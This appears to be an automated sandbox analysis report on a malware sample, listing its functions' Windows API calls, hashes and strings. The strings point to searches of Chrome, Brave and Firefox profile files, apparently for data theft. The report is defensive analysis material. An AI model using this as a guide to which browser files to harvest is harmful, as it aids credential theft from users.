                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: ec050bc399ca7574f0874c409f9df509c38949f6f614b7ba4b54c401afd29d37
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: E1113C79A00208EFDB01DF98C985E98BBF5AF08350F158094FA489B362D375EA50DF90

                                                        Non-executed Functions

                                                        Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 004138CC
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                        • API String ID: 1125553467-817767981
                                                        • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                        • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                        • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                        Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                        • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                        • API String ID: 3334442632-726946144
                                                        • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                        • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                        • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                        Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0041492C
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                        • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$%s\%s$%s\*
                                                        • API String ID: 180737720-445461498
                                                        • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                        • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                        • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                        Function 00B33B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B33B33
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B33B4A
                                                        • lstrcat.KERNEL32(?,?), ref: 00B33B9C
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B33BAE
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B33BC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B33ECE
                                                        • FindClose.KERNEL32(000000FF), ref: 00B33EE3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 1125553467-0
                                                        • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction ID: e3fb5d22718869cf19de6ce6ff4a15564bcf1d0f63dee752e3b2734d0fb13cff
                                                        • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                        • Instruction Fuzzy Hash: 3EA17CB6A40218ABDB30DBA4DC85FEE73B9FB49700F1445C8B60D96141EB759B84CF62
                                                        Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                        • wsprintfA.USER32 ref: 004145A6
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                        • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                        • lstrcatA.KERNEL32(?,0082B7A0,?,00000104), ref: 004146C5
                                                        • lstrcatA.KERNEL32(?,0082AA50), ref: 004146D8
                                                        • lstrlenA.KERNEL32(?), ref: 004146E5
                                                        • lstrlenA.KERNEL32(?), ref: 004146F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                        • String ID: %s\%s$%s\*
                                                        • API String ID: 13328894-2848263008
                                                        • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                        • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                        • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                        Function 00B34B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B34B93
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                        • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                        • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                        • FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction ID: 63055327a5abe9808d4ac03eb6cbb35fdb6fcb7fd4a26b7d966b42603be6d56f
                                                        • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                        • Instruction Fuzzy Hash: 6B6175B5940218ABCB24EBE0DD45FEA73BDFB59700F0045C8B50992141EB75AB45CF91
                                                        Function 00B2C0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B2C15C
                                                        • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B2C1B4
                                                        • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B2C1CA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2CA26
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2CA38
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction ID: ce2fc135b262d0a5adce4b0193b666cf6f7bf99a20d09bdd53ac8832db2eccd9
                                                        • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                        • Instruction Fuzzy Hash: 57425272900114ABCB14FBB0DD96EED77B9AF95300F6045E8B54AA6091EF349F48CF92
                                                        Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00413EC3
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                        • FindClose.KERNEL32(000000FF), ref: 00414081
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 180737720-4073750446
                                                        • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                        • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                        • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                        Function 00B347D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                        • wsprintfA.USER32 ref: 00B3480D
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                        • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B34852
                                                        • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B34868
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B348F2
                                                        • FindClose.KERNEL32(000000FF), ref: 00B34907
                                                        • lstrcat.KERNEL32(?,0064A524), ref: 00B3492C
                                                        • lstrcat.KERNEL32(?,0064A22C), ref: 00B3493F
                                                        • lstrlen.KERNEL32(?), ref: 00B3494C
                                                        • lstrlen.KERNEL32(?), ref: 00B3495D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                        • String ID:
                                                        • API String ID: 671575355-0
                                                        • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction ID: 4ed5c1e1bb0abc3b94cd6eb2617230a5a39fb81769376c7270a96391796e3921
                                                        • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                        • Instruction Fuzzy Hash: C65186B9580218ABC720EBB0DD89FED73BDEB54300F4045C8F64992190EB759B84CF92
                                                        Function 00B34107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 00B3412A
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00B34141
                                                        • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B3416F
                                                        • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B34185
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B342D3
                                                        • FindClose.KERNEL32(000000FF), ref: 00B342E8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID:
                                                        • API String ID: 180737720-0
                                                        • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction ID: e6252775c439095cee4dd9fe20266b24a2b4c9ca19410fd06dc1361c30cf6233
                                                        • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                        • Instruction Fuzzy Hash: 165163B6900218BBCB24FBB0DD85EEA73BDFB55300F0045C8B64992040EB75AB858F95
                                                        Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 0040ED3E
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                        • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                        • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                        • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\*.*
                                                        • API String ID: 180737720-1013718255
                                                        • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                        • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                        • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                        Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                        • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID: 4@$\*.*
                                                        • API String ID: 2325840235-1993203227
                                                        • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                        • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                        • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                        Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                        • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID: prefs.js
                                                        • API String ID: 3334442632-3783873740
                                                        • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                        • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                        • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                        Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                        • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
